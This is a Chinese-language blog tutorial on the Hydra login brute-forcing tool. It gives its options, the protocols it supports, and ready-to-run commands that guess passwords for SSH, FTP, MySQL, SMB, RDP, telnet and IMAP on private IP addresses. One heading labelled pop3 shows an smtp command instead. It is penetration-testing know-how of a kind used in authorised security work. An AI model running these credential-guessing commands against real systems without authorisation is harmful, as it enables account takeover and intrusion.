Hydra九头蛇穷举工具

hydra 是一个端口穷举服务器的工具

使用例子

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ss

常用参数

-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t <tasks> 同时运行的线程数,默认是16
-w <time> 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码
-S 大写,采用 SSL 链接
-s <PORT>小写,可通过这个参数指定非默认端口

 

支持的服务和协议

telnet 	ftp	 pop3[-ntlm]	 imap[-ntlm] 	smb 	smbnt
http[s]-{head|get}	 http-{get|post}-form	 http-proxy 	cisco	 cisco-enable	 vnc 
ldap2 	ldap3		mssql 	mysql 	oracle-listener	 postgres	 nntp 	socks5 	rexec
rlogin 	pcnfs 	snmp 	rsh 	cvs 	svn	icq 	sapr3 ssh2 	smtp-auth[-ntlm] 
pcanywhere 	teamspeak 	sip	 vmauthd	 firebird	 ncp afp
等等

  

实例分析

穷举SSH服务

-L 用户字典文件 -P 密码字典文件

-t 线程数 -vV 详细信息

-e ns 使用空口令 使用指定用户和密码试探

192.168.1.104 你要穷举的 ip ssh 是服务

-o 保存文件 -f 如果找到马上中断扫描 

hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh -o ssh.txt -f 
-l 指定用户 
hydra -l root -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh -o ssh.txt -f 
hydra -l root -P 2019_top100.txt 192.168.52.13 ssh -vV -f

  

 

 

穷举FTP服务

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
hydra -l c5moon -P 2019_top100.txt 192.168.52.6 ftp -vV -f

  

 

穷举Mysql服务

 hydra ip mysql -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
 hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV
 hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV -s 端口

  

 

爆破SMB服务

hydra -l administrator -P 2019_top100.txt 192.168.52.6 smb -v  

 

 

 

 

穷举 pop3 服务

hydra -L user.txt -P qweasd123 192.168.52.6 smtp-vV -f

穷举 rdp 服务

hydra ip rdp -l administrator -P pass.txt -V

穷举 http-proxy 服务

hydra -l admin -P pass.txt http-proxy://10.36.16.18

穷举 imap 服务

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

穷举 telnet 服务

hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

 

可视化工具Xhydra

xhydra 是 hydra 的可视化工具 使用简单方便快捷  

 

 

 

 

 

 

posted @ 2022-08-11 20:50  mlxwl  阅读(372)  评论(0编辑  收藏  举报